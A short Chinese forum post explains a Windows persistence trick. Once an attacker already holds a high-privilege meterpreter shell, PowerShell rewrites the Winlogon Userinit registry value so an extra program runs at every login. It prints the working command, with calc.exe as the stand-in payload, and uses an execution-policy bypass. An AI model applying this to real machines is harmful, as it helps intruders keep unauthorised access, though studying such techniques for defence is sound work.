|
|
Userinit会在用户登录时进行初始化设置,而WinLogon进程将执行指定的login scripts,我们可以修改Userinit的键值来加载我们需要执行的程序。
Powershell很强大,所以我们可以利用Powershell进行注册表数据的修改。
假设的环境为:已经拿到了一个高权限的meterpreter shell。
[pre]
echo Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,C:\Windows\system32\calc.exe" > system.ps1
PowerShell.exe -ExecutionPolicy Bypass system.ps1
[/pre] |
|
发表于 2020-4-30 15:47:29
